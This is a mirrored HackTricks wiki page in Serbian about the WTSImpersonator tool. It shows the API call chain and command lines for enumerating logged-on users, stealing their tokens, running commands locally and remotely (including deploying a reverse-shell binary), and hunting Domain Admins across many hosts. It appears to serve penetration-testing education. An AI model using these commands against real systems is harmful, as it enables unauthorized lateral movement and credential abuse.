mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
49 lines
2.1 KiB
Markdown
49 lines
2.1 KiB
Markdown
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Alat **WTS Impersonator** koristi **"\\pipe\LSM_API_service"** RPC Named pipe da tiho enumeriše prijavljene korisnike i preuzme njihove tokene, zaobilazeći tradicionalne tehnike Token Impersonation. Ovaj pristup olakšava neometano lateralno kretanje unutar mreža. Inovacija iza ove tehnike pripisuje se **Omri Baso, čiji je rad dostupan na [GitHub](https://github.com/OmriBaso/WTSImpersonator)**.
|
|
|
|
### Osnovna Funkcionalnost
|
|
|
|
Alat funkcioniše kroz niz API poziva:
|
|
```bash
|
|
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
|
|
```
|
|
### Ključni Moduli i Korišćenje
|
|
|
|
- **Enumeracija Korisnika**: Lokalna i daljinska enumeracija korisnika je moguća sa alatom, koristeći komande za svaku situaciju:
|
|
|
|
- Lokalno:
|
|
```bash
|
|
.\WTSImpersonator.exe -m enum
|
|
```
|
|
- Daljinski, specificiranjem IP adrese ili imena hosta:
|
|
```bash
|
|
.\WTSImpersonator.exe -m enum -s 192.168.40.131
|
|
```
|
|
|
|
- **Izvršavanje Komandi**: Moduli `exec` i `exec-remote` zahtevaju **Servis** kontekst da bi funkcionisali. Lokalno izvršavanje jednostavno zahteva WTSImpersonator izvršni fajl i komandu:
|
|
|
|
- Primer za lokalno izvršavanje komande:
|
|
```bash
|
|
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
|
|
```
|
|
- PsExec64.exe se može koristiti za dobijanje servisnog konteksta:
|
|
```bash
|
|
.\PsExec64.exe -accepteula -s cmd.exe
|
|
```
|
|
|
|
- **Daljinsko Izvršavanje Komandi**: Uključuje kreiranje i instaliranje servisa daljinski slično PsExec.exe, omogućavajući izvršavanje sa odgovarajućim dozvolama.
|
|
|
|
- Primer daljinskog izvršavanja:
|
|
```bash
|
|
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
|
|
```
|
|
|
|
- **Modul za Lov na Korisnike**: Cilja specifične korisnike na više mašina, izvršavajući kod pod njihovim akreditivima. Ovo je posebno korisno za ciljanje Domain Admins sa lokalnim administratorskim pravima na nekoliko sistema.
|
|
- Primer korišćenja:
|
|
```bash
|
|
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
|
|
```
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|